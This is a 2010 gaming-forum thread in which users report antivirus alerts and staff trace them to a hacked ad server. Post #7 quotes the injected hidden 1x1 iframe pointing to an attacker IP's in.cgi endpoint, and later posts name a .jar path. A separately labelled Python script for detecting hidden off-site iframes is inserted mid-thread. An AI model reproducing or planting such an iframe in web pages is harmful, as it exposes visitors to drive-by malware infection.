
Virus on the main page?

July 10th, 2010, 15:36
The forums don't seem to be affected, but when I try to access the main page Avast gives me an 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010
DPB
Watchdog

#1

Join Date: Sep 2009
Location: England
Posts: 200

July 10th, 2010, 16:10
I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info

194.8.250.211 IP:
194.8.250.211

194.8.250.211 server location:
Paraguay

194.8.250.211 ISP:
Donstroy Ltd.

Looks kind of fishy?
GothicGothicness
SasqWatch

#2

Join Date: Oct 2006
Posts: 4,291

July 10th, 2010, 16:31
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

deimos

Guest

#3

Posts: n/a


July 10th, 2010, 16:34
I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. This is his middle of the night so check back in about 6 to 8 hours.

Bart and Corwin should just admit that when it gets down to it, I will have the final say.
Cm
Sentinel of Light

#4

Join Date: Oct 2006
Location: Missouri USA
Posts: 2,120

July 10th, 2010, 16:37
Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owners' doing in any case.

deimos

Guest

#5

Posts: n/a


July 10th, 2010, 16:43
Windows Defender found something, definitely has to do something with Java.
Kostas
Dormant Watcher

#6

Join Date: Aug 2008
Location: Dear Green Place
Posts: 1,651

July 10th, 2010, 17:10
There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/open…s.php?zoneid=1

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffrontpage%2Fpp%2Ff6e1126cedebf23e1463aee73f9df08783640400' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a>
<div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&amp;campaignid=1&amp;zoneid=1&amp;loc=http%3A%2F%2Fwww.rpgwatch.com%2F&amp;referer=http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthread.php%3Fp%3D1061017633&amp;cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</div>
</div>
Last edited by hishadow; July 10th, 2010 at 17:25.
hishadow

Level N+1

#7

Join Date: Mar 2008
Location: Southern parts of Norway
Posts: 1,140
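
A defender-side check for the kind of markup shown in the post above, as an added example that is not part of the original thread: it parses ad-server output and reports iframes that are both invisible (1x1 or CSS-hidden) and loaded from a host other than the site's own. The sample markup, the host names and the `audit` helper are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed sample modelled on the banner markup quoted in the post above;
# 203.0.113.5 is a documentation-range placeholder, not the address from the thread.
SAMPLE = """
<div class="banner-top">
<a href="http://www.example.org/ads/ck.php?zoneid=1"><img src="http://www.example.org/ads/banner.jpg" width="468" height="60" /></a>
<iframe src="http://203.0.113.5/tds/in.cgi?default" width="1" height="1" frameborder="0" scrolling="no"></iframe>
<iframe src="/ads/afr.php?zoneid=2" width="468" height="60"></iframe>
<iframe src="//cdn.example.net/x.html" style="visibility: hidden"></iframe>
</div>
"""

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):
    """True when a width/height attribute is 0 to 2 pixels."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 2

class IframeAudit(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        # Relative URLs have no hostname and therefore belong to the site itself.
        host = (urlparse(src).hostname or self.site_host).lower()
        offsite = host != self.site_host
        invisible = (_tiny(a.get("width")) and _tiny(a.get("height"))) \
            or bool(HIDDEN_CSS.search(a.get("style") or ""))
        if offsite and invisible:
            self.findings.append((host, src))

def audit(html, site_host):
    """Return (host, src) for every invisible iframe that loads from another host."""
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for host, src in audit(SAMPLE, "www.example.org"):
        print("suspicious iframe ->", host, src)
```

Run against the rendered output of each ad zone on a schedule, a non-empty result is a signal that the ad server's stored banner code has been modified.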


July 10th, 2010, 17:22
Originally Posted by deimos
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.
I saw the prompt to install the missing plug-in as well. I didn't click it but closed it; Microsoft Security Essentials didn't alert me of a possible virus.
Remus
Antihero

#8

Join Date: Oct 2006
Location: Malaysia
Posts: 1,020

July 10th, 2010, 18:29
Got the same problem. The owner of the site is Donstroy, which apparently owns several .RU websites, which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access out of curiosity but cannot seem to, which is probably for the best. Could be an ad for Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability on some versions of the Java Deployment Toolkit. So I would recommend updating or disabling that add-in in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain
Last edited by figment; July 10th, 2010 at 18:48.
figment
Sentinel
RPGWatch Donor

#9

Join Date: Apr 2010
Posts: 521

July 10th, 2010, 18:59
I tried to email the webmaster of rpgwatch but had no success. info@rpgwatch.com or webmaster@rpgwatch.com didn't work.

You should consider trying to install those email accounts for such cases.

But glad others have reported …
cal1s
Traveler

#10

Join Date: Jan 2007
Posts: 7

July 10th, 2010, 20:15
I got the 'reported as unsafe website' when I clicked the mentioned link. I promptly then closed internet explorer. I hope I haven't gotten anything nasty, though…

Please support http://www.maternityworldwide.org/ - and save a mother giving birth to a child.
aries100
SasqWatch
RPGWatch Team RPGWatch Donor

#11

Join Date: Oct 2006
Location: Denmark, Europe
Posts: 2,035

July 11th, 2010, 10:09
Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.

"Mystery is important. To know everything, to know the whole truth, is dull. There is no magic in that. Magic is not knowing, magic is wondering about what and how and where." ~ Cortez, from The Longest Journey
Arhu
Feline Wizard
RPGWatch Team

#12

Join Date: Aug 2006
Location: Germany
Posts: 2,357

July 11th, 2010, 12:46
It's definitely fishy. My ESET NOD32 identified it as Java/Exploit.Agent.NAC Trojan Horse coming from http://woonv[dot]in
Last edited by metamorphium; July 11th, 2010 at 12:47. Reason: fishy link should not be clickable
metamorphium
Watcher

#13

Join Date: Jan 2008
Posts: 51

July 11th, 2010, 13:25
Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen exactly the same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, which BOTH triggered the same NOD32 alarm …

So I'm sure this new kind of infection hides within advertisement banners.

Any intelligent fool can make things bigger, more complex, and more violent. It takes a touch of genius and a lot of courage to move in the opposite direction. (E.F.Schumacher, Economist, Source)
Alrik Fassbauer
TL;DR

#14

Join Date: Nov 2006
Location: Old Europe
Posts: 16,002

July 11th, 2010, 15:56
I got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.
Gokyabgu
Keeper of the Watch

#15

Join Date: Oct 2006
Location: Sigil
Posts: 793

July 11th, 2010, 18:13
I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.

"Mystery is important. To know everything, to know the whole truth, is dull. There is no magic in that. Magic is not knowing, magic is wondering about what and how and where." ~ Cortez, from The Longest Journey
Arhu
Feline Wizard
RPGWatch Team

#16

Join Date: Aug 2006
Location: Germany
Posts: 2,357

July 11th, 2010, 19:33
Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the default settings for Internet Explorer as well as removing all passwords etc. it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.

Please support http://www.maternityworldwide.org/ - and save a mother giving birth to a child.
aries100
SasqWatch
RPGWatch Team RPGWatch Donor

#17

Join Date: Oct 2006
Location: Denmark, Europe
Posts: 2,035

July 11th, 2010, 21:21
Both Firefox and Chrome now block the site, hope Myrthos can sort it out quickly.
Kostas
Dormant Watcher

#18

Join Date: Aug 2008
Location: Dear Green Place
Posts: 1,651

July 11th, 2010, 22:27
Also don't forget to submit for reevaluation. Mere removing of malicious code is not enough.
metamorphium
Watcher

#19

Join Date: Jan 2008
Posts: 51

July 12th, 2010, 00:26
Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpful for those using Firefox or Chrome.

Sorry about this.

Computer n. A machine which flawlessly performs the instructions it is given, no matter how flawed those instructions may be.
Last edited by Myrthos; July 12th, 2010 at 00:40.
Myrthos
Cave Canem
Super Moderator
RPGWatch Team

#20

Join Date: Aug 2006
Location: Netherlands
Posts: 4,428

All times are GMT +2.